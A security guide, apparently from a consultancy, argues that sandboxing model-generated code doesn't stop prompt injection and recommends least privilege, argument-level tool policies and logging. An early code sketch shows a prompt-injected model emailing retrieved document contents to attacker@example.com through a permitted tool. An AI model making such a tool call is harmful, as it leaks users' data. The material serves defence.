Isolating Execution, Not Instructions

Why sandboxing code execution doesn't protect against instruction-following attacks

The Conventional Framing

Sandboxing runs model-generated code in isolated environments—containers, VMs, restricted interpreters. This prevents malicious code from affecting the host system.

The pattern is essential for safe code execution in LLM applications.

Why Sandboxing Addresses One Attack Vector

Sandboxing protects against malicious code execution—the model generates code that would harm the system, and the sandbox contains it. This is real protection for a real threat.

But prompt injection often doesn't need code execution. The model can leak data, send emails, call APIs—all within "normal" operation, all inside the sandbox.

The capability gap:

The sandbox limits what code can do to the system. It doesn't limit what the model can do with its legitimate capabilities. Exfiltrating data through an allowed API call isn't a sandbox escape—it's using permissions.
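A minimal sketch makes the gap concrete. The tool names (`send_email`, `search_docs`) and the dispatcher are hypothetical; the point is that a naive dispatcher which checks only the tool name will happily execute an injection-driven call, because no code runs and the sandbox is never involved:

```python
# Illustrative only: tool names and ALLOWED_TOOLS are hypothetical.
ALLOWED_TOOLS = {"send_email", "search_docs"}

def dispatch(tool_call: dict) -> str:
    """Naive dispatcher: checks only that the tool name is allowed."""
    if tool_call["name"] not in ALLOWED_TOOLS:
        raise PermissionError(f"tool {tool_call['name']!r} not allowed")
    # Arguments are not inspected -- this is the gap a sandbox never sees.
    return f"executed {tool_call['name']} with {tool_call['args']}"

# A prompt-injected model emits a perfectly "legitimate" call:
injected = {
    "name": "send_email",
    "args": {"to": "attacker@example.com", "body": "<retrieved document contents>"},
}
print(dispatch(injected))  # succeeds: no code ran, no sandbox was crossed
```

The call is indistinguishable from normal operation at the sandbox layer; only argument-level policy (shown later under least privilege) can catch it.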

Architecture

Components:

  • Isolated environment: container, VM, restricted runtime
  • Resource limits: CPU, memory, network constraints
  • Filesystem isolation: no access to host files
  • Network restrictions: limited or no network access
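The resource-limit component above can be sketched with OS facilities alone. This is a POSIX-only illustration (the function name `run_sandboxed` and the specific limits are choices made here, not a standard API); production systems would layer containers, seccomp, or a gVisor-style runtime on top for filesystem and network isolation:

```python
import resource
import subprocess
import sys

def run_sandboxed(code: str, cpu_seconds: int = 2,
                  mem_bytes: int = 512 * 1024 * 1024) -> str:
    """Run untrusted code in a separate process under CPU/memory rlimits.

    POSIX-only sketch: covers the "resource limits" component only;
    filesystem and network isolation need container/VM tooling.
    """
    def limit():
        # Applied in the child process before exec.
        resource.setrlimit(resource.RLIMIT_CPU, (cpu_seconds, cpu_seconds))
        resource.setrlimit(resource.RLIMIT_AS, (mem_bytes, mem_bytes))

    proc = subprocess.run(
        [sys.executable, "-I", "-c", code],  # -I: isolated mode
        capture_output=True, text=True,
        preexec_fn=limit, timeout=cpu_seconds + 5,
    )
    return proc.stdout

print(run_sandboxed("print(2 + 2)"))  # prints 4
```

An infinite loop in `code` is killed by the CPU rlimit; a memory bomb hits `RLIMIT_AS`. Neither limit constrains what the model does through its APIs, which is the article's point.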

Trust Boundaries

Sandboxed code execution:
  ✓ Can't access host filesystem
  ✓ Can't install malware
  ✓ Can't pivot to other systems

Model's other capabilities (not sandboxed):
  ✗ Can call allowed APIs with any parameters
  ✗ Can include any content in responses
  ✗ Can request any tool with any arguments

Injection uses capabilities, not sandbox escapes.

  1. Model → Code: generated code enters sandbox
  2. Sandbox → Host: execution isolated from host
  3. Model → APIs: API access outside sandbox

Threat Surface

  • Capability abuse: use legitimate capabilities maliciously. Sandboxing doesn't limit the model's intended features.
  • Data exfiltration: leak data through allowed channels. The sandbox permits normal API communication.
  • Resource exhaustion: consume all allowed resources. Sandbox limits don't prevent DoS within those limits.
  • Sandbox escape: exploit sandbox vulnerabilities. All sandboxes carry escape risk; more capability means more attack surface.
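The resource-exhaustion row deserves a note: per-run limits don't stop a model from issuing many individually-legal runs. One mitigation is a session-level budget on top of per-run limits. The class below is an illustrative sketch; the name `ExecutionBudget` and the specific numbers are arbitrary assumptions:

```python
class ExecutionBudget:
    """Cap cumulative sandbox cost per session, not just per run.

    Illustrative: per-run limits alone allow DoS via many small runs.
    """
    def __init__(self, max_runs: int = 20, max_total_seconds: float = 30.0):
        self.max_runs = max_runs
        self.max_total_seconds = max_total_seconds
        self.runs = 0
        self.total = 0.0

    def charge(self, seconds: float) -> None:
        """Record one sandbox run; raise once the session budget is spent."""
        self.runs += 1
        self.total += seconds
        if self.runs > self.max_runs or self.total > self.max_total_seconds:
            raise RuntimeError("session execution budget exhausted")

budget = ExecutionBudget(max_runs=3, max_total_seconds=5.0)
for _ in range(3):
    budget.charge(1.0)       # three runs: fine
try:
    budget.charge(1.0)       # fourth run exceeds max_runs
except RuntimeError as e:
    print(e)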

The ZIVIS Position

  • Sandboxing is necessary but not sufficient. Sandbox code execution: yes. But also control what the model can do with its non-code capabilities.
  • Principle of least privilege. Don't just sandbox code; limit all capabilities to what's actually needed. Fewer permissions = smaller attack surface.
  • Monitor sandbox activity. Even in a sandbox, unusual behavior is a signal. Log what the sandboxed code does.
  • Defense in depth. Sandboxing is one layer. Combine with input validation, output filtering, capability limits, and monitoring.
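The least-privilege and monitoring points can be combined in one dispatcher: validate arguments per tool, not just tool names, and log every call. The policies below (a query-length cap, an internal-domain check on `send_email`) are hypothetical examples of what argument-level policy looks like, not a recommended ruleset:

```python
import logging

logging.basicConfig(level=logging.INFO)
log = logging.getLogger("tool-audit")

# Hypothetical per-tool argument validators -- a name allowlist is not enough.
POLICIES = {
    "search_docs": lambda args: isinstance(args.get("query"), str)
                                and len(args["query"]) < 500,
    "send_email": lambda args: args.get("to", "").endswith("@ourcompany.example"),
}

def guarded_dispatch(name: str, args: dict) -> str:
    """Least-privilege dispatch: every call is logged, then validated."""
    log.info("tool=%s args=%r", name, args)      # monitoring: audit trail
    policy = POLICIES.get(name)
    if policy is None:
        raise PermissionError(f"tool {name!r} not permitted")
    if not policy(args):
        raise PermissionError(f"arguments rejected for {name!r}")
    return f"ok: {name}"

print(guarded_dispatch("search_docs", {"query": "quarterly report"}))
try:
    guarded_dispatch("send_email", {"to": "attacker@example.com"})
except PermissionError as e:
    print(e)  # rejected: recipient outside the allowed domain
```

This is the capability-layer counterpart of the sandbox: the sandbox contains the code, the policies contain the model's tool use, and the log makes anomalies visible.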

What We Tell Clients

Sandboxing is essential for code execution but doesn't protect against most prompt injection attacks. Injection typically works through legitimate capabilities—API calls, tool use, response generation—not code execution.

Sandbox your code execution AND apply privilege separation to all model capabilities. The sandbox contains code; capability limits contain the model.

Related Patterns